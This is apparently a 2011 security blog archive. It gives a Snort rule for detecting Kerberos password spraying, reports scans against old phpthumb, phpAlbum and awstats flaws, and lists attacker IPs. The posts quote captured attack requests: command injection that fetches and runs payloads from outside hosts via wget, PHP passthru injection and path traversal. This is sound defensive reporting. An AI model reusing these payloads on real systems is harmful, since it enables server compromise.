28 December 2011

Defeat Domain User Spraying & Brute Forcing of Passwords

A while back, LaNMaSteR53 (Tim Tomes) discussed a method for brute forcing domain default passwords while avoiding account lockout.  This discussion was in response to a video by Dave Hoelzer on using PowerShell to hack domain user accounts. 

The method proposed by LaNMaSteR53 relied on connecting to the IPC$ share of a domain controller.  While there is a discussion to be had regarding the use of administrative shares, we will table that for now and focus instead on defeating LaNMaSteR53 and his desire to control our network. 
Perhaps the most obvious way to detect this would be to review your Windows Security Event Logs on your Active Directory domain controllers.  But if LaNMaSteR53 is successful, he will eventually gain domain admin privileges and clean up his tracks.  Unless you are pumping your Windows Security Event Logs in real-time into a SIEM system of some sort and correlating based on failed logon attempts, chances are you may not see the activity at all or you may not detect it until it is too late.  So, how can you defeat or detect the presence of this activity without a snazzy, expensive SIEM system? 
One way would be via an Intrusion Detection System (IDS) such as the open source Snort product.  With a pretty simple rule, you can monitor responses sent from your Active Directory domain controllers to clients requesting authentication.  If the count of all failed authentication attempts from any given client in your enterprise exceeds a certain threshold in a specified period of time, you may be under attack even if you do not have a large number of disabled user accounts, etc. 
If an organization locks user accounts after, say, 5 failed logon attempts, one might choose to configure a rule to look for more than 4 failed logon attempts from a single client in a period of 2 minutes.  The following Snort rule accomplishes this purpose:
alert tcp any 88 -> any any (msg:"Possible domain user spraying detected"; \
flow:established, to_client; \
content:"|05|"; offset:14; depth:15; \
content:"|1e|"; distance:4; within:1; \
content:"|18|"; distance:30; within:1; \
detection_filter:track by_dst, count 4, seconds 120; \
reference:url,foxtrot7security.blogspot.com/2011/12/defeat-domain-user-spraying-brute_28.html; \
classtype:attempted-user; \
sid:1700000; \
rev:0;)

Like a lot of things in Security, you may end up with some false positives.  Some tuning of the “count” and “seconds” thresholds based on your local environment should cut out most of the noise while allowing you to detect truly malicious activity. 
Now for the truly curious who are asking the question, “So how does this rule work?”… 
Microsoft adopted Kerberos as the preferred authentication protocol for Windows 2000 and subsequent Active Directory domains.  While a comprehensive discussion of Kerberos 5 is beyond the scope of this post, there is a good Microsoft TechNet article that explains it pretty well.  Kerberos 5 is also defined in RFC 5120.
By default, Microsoft Active Directory has a Kerberos feature called pre-authentication enabled.  Pre-authentication makes offline password guessing attacks very difficult and, during the course of the user authentication, a Kerberos error is generated if an invalid user password is presented as part of the pre-authentication process.  The Kerberos error generated in this case is KDC_ERR_PREAUTH_FAILED.  This error code is set within the context of a KRB-ERROR structure is defined in the RFC as follows: 
   KRB-ERROR ::= [APPLICATION 30] SEQUENCE {
           pvno            [0] INTEGER (5),
           msg-type        [1] INTEGER (30),
           ctime           [2] KerberosTime OPTIONAL,
           cusec           [3] Microseconds OPTIONAL,
           stime           [4] KerberosTime,
           susec           [5] Microseconds,
           error-code      [6] Int32,
           crealm          [7] Realm OPTIONAL,
           cname           [8] PrincipalName OPTIONAL,
           realm           [9] Realm -- service realm --,
           sname           [10] PrincipalName -- service name --,
           e-text          [11] KerberosString OPTIONAL,
           e-data          [12] OCTET STRING OPTIONAL }

These responses are delivered from the KDC (aka the targeted domain controller) to the client via TCP port 88 which is the registered port for Kerberos.  All we need to do is inspect the packets returned to the client for the proper pvno (protocol version number), msg-type and error-code to be able to detect a failed login.  Then we simply count the number of failed logins versus our threshold values for count and seconds and—viola—we know what is going on in our network! 

So how does this work via the Snort rule presented?  First, we start with a packet capture of a failed login and look for the packet containing the KDC_ERR_PREAUTH_FAILED message.  The payload might look something like this: 

0000        00 00 00 e5 7e 81  e2 30 81 df a0 03 02 01   ......~. .0......
0010  05 a1 03 02 01 1e a4 11  18 0f 32 30 31 31 31 32   ........ ..201112
0020  32 31 32 31 31 30 35 39  5a a5 05 02 03 0e cb ab   21211059 Z.......
0030  a6 03 02 01 18 a9 06 1b  04 58 58 61 64 aa 19 30   ........ .XXad..0
0040  17 a0 03 02 01 02 a1 10  30 0e 1b 06 6b 72 62 74   ........ 0...krbt
0050  67 74 1b 04 58 58 61 64  ac 81 90 04 81 8d 30 81   gt..XXad ......0.
0060  8a 30 49 a1 03 02 01 0b  a2 42 04 40 30 3e 30 09   .0I..... .B.@0>0.
0070  a0 03 02 01 17 a1 02 04  00 30 0a a0 04 02 02 ff   ........ .0......
0080  7b a1 02 04 00 30 09 a0  03 02 01 80 a1 02 04 00   {....0.. ........
0090  30 1a a0 03 02 01 03 a1  13 04 11 58 58 41 44 2e   0....... ...XXAD.
00a0  58 58 2e 43 4f 4d 6f 6f  6f 66 75 73 30 3d a1 03   XX.COMdo ofus0=..
00b0  02 01 13 a2 36 04 34 30  32 30 05 a0 03 02 01 17   ....6.40 20......
00c0  30 06 a0 04 02 02 ff 7b  30 05 a0 03 02 01 80 30   0......{ 0......0
00d0  1a a0 03 02 01 03 a1 13  1b 11 58 58 41 44 2e 58   ........ ..XXAD.X
00e0  58 2e 43 4f 4d 64 6f 6f  66 75 73                  X.COMdoo fus   

One hint:  Wireshark understands Kerberos packets (and many other protocols too!) and makes this much easier and far more understandable.  Hence, using Wiresshark is highly recommended when doing protocol analysis.

Let’s look at our rule again and break down the important parts in the context of the packet.  We start with:
alert tcp any 88 -> any any (msg:"Possible domain user spraying detected"; \
We are looking at “any” IP sending traffic on tcp port 88 since we are inspecting Kerberos traffic.  The directional arrow specifies that we are looking for the traffic to originate on tcp port 88.  (More advanced topic:  you could improve rule performance by creating a variable in Snort equating it only to your domain controllers.  Your sensors would have less traffic to inspect that way!)

The next line says that the communication should be part of an established TCP session between the client and the server and that the response traffic should be destined for the client from the server:

flow:established, to_client; \

Now we start our content inspection.  Omitting the first 14 bytes of the packet (essentially Kerberos stuff we don’t care about, but which is defined in the RFC) we can find our protocol version number or pvno.  We expect this value to be hexadecimal “05” since we are inspecting Kerberos version 5 traffic. 

content:"|05|"; offset:14; depth:15; \

Moving deeper into the packet, we find the msg-type field and look for a decimal value of 30 as specified in the RFC snippet shown above.  Expressed in hexadecimal, this value is “1e”.  If we get this value, we know that we are now dealing with a Kerberos 5 error message. 

content:"|1e|"; distance:4; within:1; \

At this point, we need only make sure we have found the pre-authentication failure.  Buried deep in the packet 30 bytes beyond the msg-type field, we find the err-code field which should contain a decimal value of 24 if this is a pre-authentication failure.  This corresponds to a hexadecimal value of “18”. 

content:"|18|"; distance:30; within:1; \

And to track how many responses are going to a client, we use the following line: 

detection_filter:track by_dst, count 4, seconds 120; \

The track by_dst says to start a new set of counters for each client IP requesting authentication.  Count and seconds are our thresholds for alerting.  Remember, we will actually alert on the 5th failed authentication attempt if we specify a count of 4 because this is saying MORE than 4 detected events. 

I didn’t spell it out above, but there really is a method to the madness when you are creating these types of rules: 

1. Make sure you understand the problem you want to solve. 
2. Capture traffic that illustrates the problem.
3. Look at the traffic and understand it thoroughly based on the protocol definition. 
    Make sure you understand the traffic flow characteristics and directional nature of the traffic.
4. Identify anything in the traffic that would allow you to spot the problem you are trying to solve.
5. Write a rule using what you have learned. 
6.  Test and implement the rule once you know that it captures the traffic you want. 

Above all, don’t get impatient when doing your research.  This is hard work and requires a pretty detailed level of understanding.  You will often need hours of time to solve a single problem especially if you are not intimately familiar with the protocol or process in question. 

With that, I am signing off for 2011.  Hope everyone has a safe and happy 2012. 

22 December 2011

New attempts to exploit old phpthumb vulnerabilities

After several weeks of heavy scanning for awstats vulnerabilities that reminded us of the importance of patching followed by some scanners trying to exploit phpAlbum vulnerabilities, we now have seen thousands of attempts to exploit a phpthumb vulnerability first reported by Secunia in April 2010 as CVE-2010-1598.   (Hey, give these guys some credit… they started out using the awstats vulnerability that was first discovered in 2006… maybe we should we call this progress?)

The vulnerability text states that it is applicable to phpthumb version <= 1.7.9.  The current version is 1.7.11 and is available for download here. If you are using phpthumb, upgrade to the latest version to avoid becoming a victim.  

The requests I have seen are typically as follows:  

GET /admin/phpthumb/phpthumb.php?fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; & src=file.jpg & phpThumbDebug=9

GET /lib/phpthumb/phpthumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; & phpThumbDebug=9  

IPs seen today were as follows:

91.121.61.223
202.131.87.70


19 December 2011

Attacks against awstats also include attacks against phpAlbum

Following up to a post from last Friday regarding the importance of patching, I thought I would update some of the activity we are seeing from the various folks running scans for the awstats vulnerabilities previously mentioned.  It seems that in addition to looking for the various awstats vulnerabilities, the scanners have now added some searches for some vulnerabilities in phpAlbum that were disclosed on Exploit DB at the end of October. 

If you look at the requests made of main.php (below), you can see that the scanner is trying to do PHP code injection to identify vulnerable systems for later exploitation. According to the phpAlbum web site this bug has already been fixed, but I have not independently verified that information.  That being said, it would seem prudent to upgrade your version of phpAlbum. 

Since phpAlbum frequently used with Joomla installations, this is probably closely related to similar activity that Ryan Barnett pointed out recently on the Spiderlabs blog. Note that the scanner is also trying a directory traversal attempt with index.php. 

GET /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /apps/phpalbum/main.php?var1=1'.passthru('id').';&cmd=setquality
GET /awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /catalog/
GET /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo|
GET /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ[[#0]]
GET /index.php?option=com_simpledownload&controller=../../../../../../../../../../../../../../../proc/self/environ
GET /?mod=../../../../../../proc/self/environ[[#0]]
GET /phpAlbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
GET /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
GET /site.php?a={${passthru(chr(105).chr(100))}}
GET /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
GET /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|


Some additional IPs we have seen involved in this activity are as follows: 

220.162.244.251
218.77.120.135
82.130.140.90
78.46.104.76
202.213.205.172
62.48.74.126
190.196.30.122
209.109.129.166

16 December 2011

The Importance of Patching...

Four days ago, I posted a question on Full Disclosure asking folks if they had seen increased activity related to some old vulnerabilities in the awstats package.  A couple of days ago SpiderLabs blogged about this and added some of the requests and IPs originating this traffic.  SpiderLabs also advised people to upgrade awstats to avoid being victims of this.  Yesterday, I did some digging and can add a few more IPs to SpiderLabs original list along with some additional information and advice. 

First, I have seen traffic from the following IPs in addition to those posted by SpiderLabs:
114.32.50.243
124.193.142.249
189.114.94.226
189.19.13.239
190.90.158.146
203.148.85.172
72.252.248.111

And now for the more important part...
If you add the IPs above to those posted by SpiderLabs, you will end up with a total of 64 unique IPs.  Looking at the 61 of 64 servers with a service on port 80, 42 responded to a wget with HTML that appears to be representative of legitimate business or end-user content. 

Taking a couple of examples, I see that a few of these servers are sitting on legitimate corporate networks and hosting content related to the business that holds the allocation for the assigned IP.  That being the case, it seems reasonable to me to assume that at least some of these servers were compromised in some fashion and that they did not voluntarily begin running these scans for the awstats package.   A couple of cases in point here…

The HTTP server running on port 80 at IP 118.97.50.11 serves a redirect to a secure web server running on port 443 at the same IP.  While the server running https via port 443 is using a self-signed certificate, the IP itself is allocated to Telkom Indonesia and the application presented indicates that it is the “Telkom Group Knowledge Management System”. 

Another case in point:  The domain www.infolution.fr resolves to 80.248.214.103.  As before, the IP is allocated to Infolution, a French information architecture society. 

I could provide more examples, but you probably get my point.  So, if these guys didn’t voluntarily self-install an awstats scanner, what allowed this to happen?  Not certain, but I can say that these servers (and many of the others) have something in common:  they are running old versions of Apache.  The first example is running Apache 2.2.3, released in 2006.  The second example is running a version 2.2.16, released in mid-2010.    This seems to be a very common condition. 

Looking a bit more closely at the 64 IPs, 48 of 64 are confirmed as running Apache.  Of the 48 Apache servers, 41 provide a version number.  Of the 41 servers, only 2 are running the current stable version (2.2.21).  The remaining 39 are all running old versions of Apache.  Here is the breakdown of old versions: 

Version
Count
Release Year
2.2.21
2
2011
2.2.15
1
2010
2.2.16
3
2010
2.2.12
1
2009
2.2.11
3
2008
2.2.8
6
2008
2.2.9
3
2008
2.0.61
1
2007
2.2.6
3
2007
1.3.36
1
2006
2.0.59
2
2006
2.2.3
8
2006
2.2.2
3
2005
2.0.52
4
2004

But wait, you say….  What about awstats?  Couldn’t that be what caused this?  Sure, but only 7 of the 64 servers seem to be running awstats at this time.  That doesn’t mean that awstats wasn’t the original problem, but it could have been Apache just as easily. Or WordPress, Joomla, PHP or any other random applications installed on these servers. Apache just seems to be the most common and exploiting some ancient Apache bug across a wide range of systems would be arguably easier than cracking each one open using a different vulnerability.  And some of these servers just have a generic Apache instance installed with no PHP or other applications.  So, in my mind, old Apache seems to be a very common link.  Not conclusive, just common. 

So, I’d add this to SpiderLabs recommendation:  Upgrade your Apache version (and your OS, PHP, Wordpress, Joomla, etc., while you are at it).  And if your IP is on the list published by SpiderLabs or in this post, you have a problem.  Follow your incident response plan and clean this up! 

14 December 2011

Track your Google search results with googdiff

Blackhat Search Engine Optimization (SEO) practitioners attempt to change or improve search engine results in ways that are unapproved by the search engines and which often involve deception.  Blackhat SEO techniques can be used to make fraudulent pages appear more prominent, siphoning money from legitimate companies and charities, or allowing the blackhat SEO to impersonate prominent individuals, ascribing their own views or opinions to the targeted individual for economic or political gain.
With 65% of the US market share for Internet search, Google is the de facto authoritative source of information for millions of Americans each day.  Users assume that the links appearing on Google’s first page of search results have a great deal of credibility and relevance.  By paying attention to the first page of search results and carefully noting how those search results change for your key search terms, you can more easily determine whether or not someone is misusing your online identity or overtaking your ranking on Google’s front page, costing you lost sales.
googdiff helps you monitor your online identity or the online identity of your business as revealed by Google’s front page search results, helping protect you from so-called “Blackhat” SEO (SEO) “consultants”.  This utility is available at http://code.google.com/p/googdiff/